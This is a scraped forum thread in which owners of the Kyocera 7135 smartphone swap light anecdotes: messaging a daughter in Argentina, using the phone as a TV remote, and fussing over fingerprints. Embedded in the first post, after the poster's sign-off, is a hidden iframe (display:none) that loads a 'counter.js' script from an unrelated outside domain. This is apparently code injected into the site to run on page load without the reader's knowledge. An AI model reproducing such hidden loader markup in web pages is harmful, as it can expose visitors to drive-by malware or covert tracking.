+ Reply to Thread

Thread: 7135 Stories

7135 Stories

Thought I'd start a thread where we could discuss our uses of the 7135.

Might include:
    - How the 7135 "saved my bacon"
    - Reactions by the uninitiated
    - Funnies.....

Could be great fodder for KYO and will show VZW and Sprint what they are missing.

I'll kick it off:

Took my 7135 out into public for the first time on Saturday. I had limited time on Friday to load up all my aps so I was running "light".

One of my many outside work activites is Cub Scouting and Saturday was our annual Pinewood Derby. Over the years this has become one of our most popular events and thanks to lots of hard work and efforts of many parents, this years event was a huge success.

Between the 3rd and 4th rounds of racing, I was chatting with a number of Dad's in our Webelos Den. Now this is not a technophobic bunch. All have Palms, multiple PC's/Mac's/Unix boxes at home and while not all are in hi-tech, everyone is 'wired". There was good natured ribbing going on with 4 out of the 5 fastest cars in the Pack coming from the sons of this bunch; side bets were being placed on the Dads' races which would be held later in the morning and video camera/monitor angles were being reviewed for future events.

As this was going, I get an SMS message. I calmly pulled the new 7135 out the holster, flipped her open with Geek Sounds chirping.
    Grins from the Dad's and curiosity because this was a new form factor and the color screen was gorgeous. Silently everybody huddles around looking over my shoulder.

Saw the mesage was from my eldest daughter who has taken this yr. off from college and had just arrived in Argentina to work for 6 mo. SMS was acknowledgement that she had arrived at her destination. I quickly shot back a reply in my best high school Spanish(poor, very poor) and asked her to go to AIM. AIM connected like a champ and we had a brief chat to make sure she was OK. Total elapsed time: 3-4 min. After we were done, I calmly shut down the AIM session, closed the flip and re-holstered. Silent nods of approval and buckets of drool from the Dad's.

To steal liberally from MasterCard:

- Kyocera 7135 from Get Connected/w 2 day delivery: $699.99
    - Admiring looks of friends at cool technology: Precious
    - Knowing your daughter is safe and sound in a foreign land...real- time: Priceless

Ham<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Great story, thanks for sharing.

Re: 7135 Stories

Originally posted by hhbarnes

To steal liberally from MasterCard:

- Kyocera 7135 from Get Connected/w 2 day delivery: $699.99
    - Admiring looks of friends at cool technology: Precious
    - Knowing your daughter is safe and sound in a foreign land...real- time: Priceless

Ham
    Sweet! :clap
    Please visit my picture site: Robert-O-Rama :)

ROFL!!!
    :rofl
    iPhone therefore iAm.

That's just awesome. Really!

Excellent story and a fine example of how this phone really does make our lives much nicer. Really great example. Glad your daughter is doing well.
    Let's keep the stories coming. I like this thread.
    ~'kito
    pdaPhoneHome Moderator

Here's one that is NOWHERE near as nice as hhbranes' story, but I was over at my brother-in-law's house the other night and I was showing off my 7135 (of course) and when he wasn't looking, I programmed his TV's remote control on my OmniReomote Pro on my 7135. I showed him how I could control his TV, etc. Then later that night, one of the kids had misplaced the remote and we couldn't find it. Well a show came on that I felt I didn't want my little boys to see and we couldn't find the remote. So I grabbed my 7135 and changed the channel. It was pretty cool.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Here's one that is NOWHERE near as nice as hhbranes' story, but I was over at my brother-in-law's house the other night and I was showing off my 7135 (of course) and when he wasn't looking, I programmed his TV's remote control on my OmniReomote Pro on my 7135. I showed him how I could control his TV, etc. Then later that night, one of the kids had misplaced the remote and we couldn't find it. Well a show came on that I felt I didn't want my little boys to see and we couldn't find the remote. So I grabbed my 7135 and changed the channel. It was pretty cool.
    Very Cool Markito. I need to get those Replay templates form you sometime. Have you figured out the maximum IR range on that puppy yet?
    iPhone therefore iAm.

For me, 15 to 17 feet (my couch to my 32" TV).

I should have beamed the templates to you when we were at Chevy's.
    ~'kito
    pdaPhoneHome Moderator

I still use the older model-- do you think they ate the same?
    iPhone therefore iAm.

'kito:

Great story...lost remotes with kids....hmmm, never happens in my house (yeah right).

ham

Keep your Paws Off!!!

I want to be loving, caring, and sharing about my 7135 but...

During my staff meeting today, one of my employees motioned to inspect my 7135. I let him. When he handed it back, it was put in the cradle BACKWARDS!! Dang! I'd rather not let anyone else touch my "precious" if that is the treatment I can expect.

OK, it was not that big a deal.

Re: Keep your Paws Off!!!

Originally posted by Beryl
    I want to be loving, caring, and sharing about my 7135 but...

During my staff meeting today, one of my employees motioned to inspect my 7135. I let him. When he handed it back, it was put in the cradle BACKWARDS!! Dang! I'd rather not let anyone else touch my "precious" if that is the treatment I can expect.

OK, it was not that big a deal.
    I don't know Beryl, I think that is a big deal... very very few people have ever been allowed to hold my smartphones (pdQ, 6035, Treo... and someday a 7135). I went out to dinner with my parents last week and was showing them all of the things I could do and my dad wanted to hold it, and he takes my Treo from me by the top half of the flip and gets fingerprints all over the see thru plastic screen protector part... (ok, it doesn't seem like such a big deal when you actually say it out loud to other people ). But I don't just keep my smartphones clean... I freaking "detail" them. I clean out dust around the buttons and seams with needles and a can of air, and clean the screen with a soft damp paper towel daily. Well, I'd better stop before I get to the weirder stuff (and that's how I treat a "lowly" Treo... wait until I get a 7135 )
    Please visit my picture site: Robert-O-Rama :)

Yeah Robert, you will be like Lenny in "Of Mice & Men", stroking and petting the 7135 until the top half snaps off. If only there were a George around to tell you to let go of the "little bunny rabbit".
    ~'kito
    pdaPhoneHome Moderator